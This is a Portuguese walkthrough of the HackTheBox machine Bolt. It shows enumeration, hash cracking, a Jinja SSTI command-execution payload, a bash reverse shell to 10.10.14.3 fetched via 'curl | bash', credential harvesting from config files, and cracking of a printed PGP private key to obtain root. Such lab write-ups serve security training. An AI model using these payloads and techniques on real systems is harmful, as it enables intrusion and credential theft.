> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/writeups-ctf/hackthebox/linux-medium/bolt-hackthebox-writeup.md).

# Relato do HackTheBox Bolt

{% embed url="<https://app.hackthebox.com/machines/384>" %}

{% hint style="warning" %}
**Habilidades:**

* Vazamento de Informações
* Enumeração de subdomínios
* SSTI (Injeção de Template no Lado do Servidor)
* Abusando do PassBolt
* Abusando do GPG
  {% endhint %}

## Reconhecimento

**Configuração do ambiente de trabalho:**

Configure o ambiente de trabalho criando três pastas para armazenar conteúdo importante, exploits e resultados de reconhecimento do Nmap.

<figure><img src="/files/24c4dc44b8cb1c284c907e001832b595fdecae1a" alt="" width="563"><figcaption></figcaption></figure>

**Verificação de conectividade da VPN**

Verifique a conectividade da VPN para garantir comunicação estável com a máquina-alvo.

<figure><img src="/files/b207e8d542fd0ecb9914a09eb8faf72eb7852013" alt="" width="563"><figcaption></figcaption></figure>

**Descoberta de portas abertas com Nmap:**

Enumere as portas abertas e exporte os resultados para o arquivo "allPorts" no diretório do Nmap:

```bash
nmap -p- --open -sS -Pn -n --min-rate 5000 -vvv 10.10.11.114 -oG allPorts
```

<figure><img src="/files/86969fa9feb7213580ba6987c8a1e55b9164ff3d" alt=""><figcaption></figcaption></figure>

**Análise de portas abertas com extractPorts:**

Use a função extractPorts para exibir as portas abertas em um formato conciso e copiá-las para a área de transferência (22,80,443)

<figure><img src="/files/f247b14b9d82fa1e9c7af5218cace75d88642d13" alt="" width="563"><figcaption></figcaption></figure>

**Varredura de versão de portas com Nmap:**

Use o Nmap para verificar as versões dos serviços e salvar a saída no arquivo "targeted":

```bash
nmap -sCV -p22,80,443 10.10.11.114 -oN targeted
```

<figure><img src="/files/dfa18328acb81834009b769012082bf603805351" alt=""><figcaption></figcaption></figure>

Para resolver nomes de domínio em endereços IP via DNS, inserimos o nome de domínio associado ao seu endereço IP no `/etc/hosts` arquivo.

<figure><img src="/files/c9e58000c8c789a1e8aa1bcecfdee8b36a0fc0c4" alt="" width="563"><figcaption></figcaption></figure>

### Porta 80

<figure><img src="/files/449f79b0eab18405835b7e693244020df5a51ca3" alt=""><figcaption></figcaption></figure>

Tentamos criar uma conta, mas recebemos um "Internal Server Error".

<figure><img src="/files/bde92c13c9f886c2eeb0d7cd56614af81ca54f07" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/e87729264eb751d1c00b84b341f1a7ed80b0b92e" alt=""><figcaption></figcaption></figure>

**Lista de possíveis usuários:**

* Joseph Garth
* Bonnie Green
* Jose Leos

<figure><img src="/files/1ea43bed45a6f1a8464f9617bd7c476b83cf7601" alt=""><figcaption></figcaption></figure>

Nos é oferecido baixar um `.tar` Docker image, incluindo um pacote web básico para iniciar um projeto com um design elegante.

<figure><img src="/files/c8927b418c6f4005dd2b6551d6fcebaeb3ee9aa2" alt=""><figcaption></figcaption></figure>

**Busca de diretórios:**

Realizamos uma busca de diretório com `gobuster`:

```bash
gobuster dir -u http://bolt.htb  -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
```

Nada de interessante foi encontrado.

<figure><img src="/files/b970298b14db83ff0f208339e28485b15f9d30a7" alt=""><figcaption></figcaption></figure>

**Busca por subdomínios:**

Buscamos subdomínios com `gobuster`:

```bash
gobuster vhost -u http://bolt.htb  --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
```

Subdomínios encontrados:

* `demo.bolt.htb`
* `mail.bolt.htb`

<figure><img src="/files/30d001e28bae27170d306a21dfe98e33bd1e470f" alt=""><figcaption></figcaption></figure>

Nós os adicionamos ao `/etc/hosts` arquivo.

<figure><img src="/files/a942fab5ad0fc54cde90bf82744e8518f83f6226" alt="" width="563"><figcaption></figcaption></figure>

**`http://mail.blolt.htb`**

<figure><img src="/files/f768b274bc7ed16a1c4389cb4f01cc120e8c82ec" alt="" width="563"><figcaption></figcaption></figure>

**`http://demo.bolt.htb:`**

<figure><img src="/files/72b84366971d758e6d5c038f9706fe9acf972706" alt="" width="563"><figcaption></figcaption></figure>

### Vazamento de informações (image.tar)

Estamos procurando informações sensíveis no arquivo Docker `.tar` que contém pastas com o arquivo `json`, arquivo `layer.tar` e versão.

<figure><img src="/files/391ef64d2eeebc253ad5b80605c488f0457221b0" alt=""><figcaption></figcaption></figure>

**Extração de arquivos:**

Extraímos os arquivos de `layer.tar` da seguinte forma:

```bash
mkdir extracted_layers
```

```bash
find . -name "layer.tar" -exec tar -xvf {} -C extracted_layers /;
```

<figure><img src="/files/866d9ed8568b64495eec183866491ed0dc480407" alt=""><figcaption></figcaption></figure>

Abrimos o `db.sqlite3` banco de dados:

```sql
sqlite3 db.sqlite3 

.tables
Select * from user
```

Encontramos um usuário `admin` com uma senha hash:

* `id`: Identificador único do usuário.
* `nome de usuário`: Nome de usuário (`admin` neste caso).
* `email`: Endereço de e-mail associado (`admin@bolt.htb`).
* `senha`: Senha com hash (`$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.`).

<figure><img src="/files/f6dd295bbf8b8ea9b77c9cf9d157ef9f3d815097" alt="" width="468"><figcaption></figcaption></figure>

Descriptografamos a senha com `john`:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

`admin:deadbolt`

<figure><img src="/files/1c037d7def8963e50821415d1f93eebf2206cbe0" alt="" width="563"><figcaption></figcaption></figure>

Fazemos login no painel administrativo, mas não encontramos nada interessante, exceto que ele usa Flask.

<figure><img src="/files/614182b1f5ec09ad23494636d473326ea027a596" alt=""><figcaption></figcaption></figure>

**Busca pelo código de convite:**

<figure><img src="/files/6d9e1f2496c506baa226736ac214497a943ee780" alt="" width="529"><figcaption></figcaption></figure>

Estamos procurando o código de convite nos arquivos extraídos:

```bash
grep -ri "invite_code" .
```

<figure><img src="/files/051c2ae267bf9dd8a35c91203b66ca67e4d25d7e" alt=""><figcaption></figcaption></figure>

Um arquivo Python contém o código de convite:

`XNSS-HSJW-3NGU-8XTJ`

<figure><img src="/files/c80fad391d00752d8dc0065611988a996cd3f084" alt=""><figcaption></figcaption></figure>

Criamos uma nova conta de usuário `jordan` com a senha `Jordan1234`, então temos acesso à caixa de entrada e à demonstração do painel administrativo.

<figure><img src="/files/9b01d23079853027ea51b2494bff97ac279f69a7" alt="" width="563"><figcaption></figcaption></figure>

* `usuário: jordan`
* `senha: Jordan1234`

<figure><img src="/files/25589d5136ca3b83bfe48a7acd0e6d1235ab495c" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/79375c73728944d00bcdc69f9712f9a7a61bd573" alt=""><figcaption></figcaption></figure>

## Vulnerabilidade SSTI :

Observando a configuração, notamos que, se alterarmos o nome da nossa configuração, um e-mail de confirmação é enviado. Isso pode ser uma oportunidade para um ataque SSTI.

<figure><img src="/files/050e0c6f84000123b072727c0493a425696af1b2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/26a05f18e0bc93fba10f4a52ef76e2ab20edae9e" alt=""><figcaption></figcaption></figure>

Testamos com um payload típico:

```bash
{{ 9*9 }}
```

Se o resultado for `81`, a aplicação é vulnerável.

<figure><img src="/files/8d784ff75da31c527b45b144aefaa2b1693ea5ad" alt=""><figcaption></figcaption></figure>

Confirmamos que a aplicação é vulnerável e testamos injeção de comandos com um payload do `payloadallthethings`:

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings>" %}

ID do pedido:

```bash
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
```

<figure><img src="/files/7868287e049009809e3f6eab351a34bdb13dcf35" alt=""><figcaption></figcaption></figure>

Conseguimos executar uma reverse shell escutando na porta 443:

```bash
nc -nlvp 443
```

Criamos um `index.html` arquivo com o seguinte conteúdo para executar uma reverse shell

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
```

Em seguida, iniciamos um servidor HTTP com Python:

```bash
python3 -m http.server 80
```

Enviamos o payload com `curl` para recuperar e executar o comando:

```bash
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.10.14.3 | bash').read() }}
```

<figure><img src="/files/af6b3b3bfc7cd8734b5f07733ffd77833909e4d4" alt=""><figcaption></figcaption></figure>

**Estabilização do terminal :**

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

#### Estabilize a shell para um trabalho mais confortável. <a href="#stabilize-the-shell" id="stabilize-the-shell"></a>

## Elevação de privilégios :

Como o usuário `www-data`, estamos tentando elevar nossos privilégios para obter acesso root.

### Enumeração inicial com LinPEAS

Você usou o LinPEAS para identificar possíveis vulnerabilidades no sistema.

{% embed url="<https://github.com/peass-ng/PEASS-ng/releases>" %}

Comandos executados:

```bash
python3 -m http.server 555
```

```bash
wget http://10.10.14.3:555/linpeas.sh
```

<figure><img src="/files/af0c721f92d23a10d1a8062695b8eb49101093a0" alt=""><figcaption></figcaption></figure>

O LinPEAS revelou um arquivo de configuração contendo informações sensíveis:

`/etc/passbolt/passbolt.php`

* `host :localhost`
* `port : 3306`
* `username : passbolt`
* `password : rT2;jW7<eY8!dX8}pQ8%`
* `database : passboltdb`

<figure><img src="/files/8a10a12f553d9cbd56e51d5ff51d80f52b60131e" alt=""><figcaption></figcaption></figure>

### **Conexão com o banco de dados MySQL**

Usando as informações para se conectar ao banco de dados:

```bash
mysql -h localhost -P 3306 -u passbolt -p 

rT2;jW7<eY8!dX8}pQ8%
```

#### **Análise das tabelas no banco de dados**

<figure><img src="/files/1263bfef960e01396587aa73e6f730fe8db074b3" alt=""><figcaption></figcaption></figure>

* **`users`**: Contém usuários.

<table data-header-hidden data-full-width="true"><thead><tr><th width="125"></th><th width="112"></th><th width="124"></th><th width="101"></th><th width="109"></th><th width="110"></th><th></th></tr></thead><tbody><tr><td><code>id</code></td><td><code>role_id</code></td><td><code>nome de usuário</code></td><td><code>ativo</code></td><td><code>deleted</code></td><td><code>created</code></td><td><code>modified</code></td></tr><tr><td><code>4e184ee6-e436-47fb-91c9-dccb57f250bc</code></td><td><code>1cfcd300-0664-407e-85e6-c11664a7d86c</code></td><td><code>eddie@bolt.htb</code></td><td>1</td><td>0</td><td>2021-02-25 21:42:50</td><td>2021-02-25 21:55:06</td></tr><tr><td><code>9d8a0452-53dc-4640-b3a7-9a3d86b0ff90</code></td><td><code>975b9a56-b1b1-453c-9362-c238a85dad76</code></td><td><code>clark@bolt.htb</code></td><td>1</td><td>0</td><td>2021-02-25 21:40:29</td><td>2021-02-25 21:42:32</td></tr></tbody></table>

* **`secrets`**: Mensagens criptografadas (potencialmente exploráveis mais tarde).

<figure><img src="/files/daf8cc3b841ed4f7fed22c25bd47a8789407637a" alt=""><figcaption></figcaption></figure>

* **`gpgkeys`**: Contém chaves públicas (podem ser usadas em certos cenários).

<figure><img src="/files/6000f07a81116b1896f1857e5b6cc615d62cfc0c" alt=""><figcaption></figcaption></figure>

Tentando se conectar com `eddie`:

```bash
su eddie
```

* **Senha**: `rT2;jW7<eY8!dX8}pQ8%`
* Acesso ao usuário `eddie` obtido

### Flag user.txt :)

<figure><img src="/files/e71f40f520cb788f73e85bae984182627417bd44" alt="" width="563"><figcaption></figcaption></figure>

### Reutilizando o LinPEAS (usuário eddie)

Após obter acesso ao usuário `eddie`, reutilizamos **LinPEAS** para explorar o sistema em busca de possíveis chaves SSH ou outras pistas úteis.

<figure><img src="/files/aa7814d65e8bdcb950afe04479543bf9e124e3ca" alt=""><figcaption></figcaption></figure>

**Arquivo encontrado**: Um arquivo de log contendo possíveis chaves SSH:

`/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log`

<figure><img src="/files/556a4f2daeed422954cc8c3e01295642836b1881" alt=""><figcaption></figcaption></figure>

### Descriptografia de mensagens com GPG

**Chave privada GPG**: Usamos a **GPG** ferramenta para importar a chave privada e tentar descriptografar a mensagem criptografada no `secrets` tabela no `passboltdb` banco de dados.

```
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

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
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
```

#### Extraindo o hash da chave privada

Para poder usar a chave privada, primeiro precisamos obter seu **hash**. Usamos a **gpg2john** ferramenta para extrair o hash da chave privada:

```bash
gpg2john private.key > hash
```

<figure><img src="/files/2c56a760ab18b0e856df80c1addcec561560b893" alt=""><figcaption></figcaption></figure>

**Força bruta da senha da chave privada com `john`**

Usamos **John the Ripper** para realizar um ataque de dicionário e descobrir a senha da chave privada. Usamos a wordlist **rockyou.txt** para isso:

```bash
john -wordlist=/usr/share/wordlists/rockyou.txt hash
```

**Senha encontrada**: `merrychristmas`

<figure><img src="/files/8c4eae41c4f0df8edbed9ef3c3a502c54e599e97" alt=""><figcaption></figcaption></figure>

#### Importando a chave privada e descriptografando a mensagem

Importamos a chave privada com **gpg**

```bash
gpg --import private.key
```

<figure><img src="/files/a4f902452b4f1470d606fc0ccec1f773e80ff2e6" alt=""><figcaption></figcaption></figure>

Depois, descriptografamos a mensagem criptografada (provavelmente contida no `message.txt` arquivo obtido do `secrets` banco de dados):

```bash
gpg --decrypt message.txt
```

**Senha de root encontrada**: `Z(2rmxsNW(Z?3=p/9s`

<figure><img src="/files/2ce5ec82941ee269dab0f6960bb56d8fad5e1600" alt=""><figcaption></figcaption></figure>

### Bandeira root.txt

<figure><img src="/files/d73632e832ef543dbbfae2d85e6170d0e61ac408" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/ccba7b816bd5963b70dfc01feb02ce91f6697e57" alt="" width="529"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/writeups-ctf/hackthebox/linux-medium/bolt-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
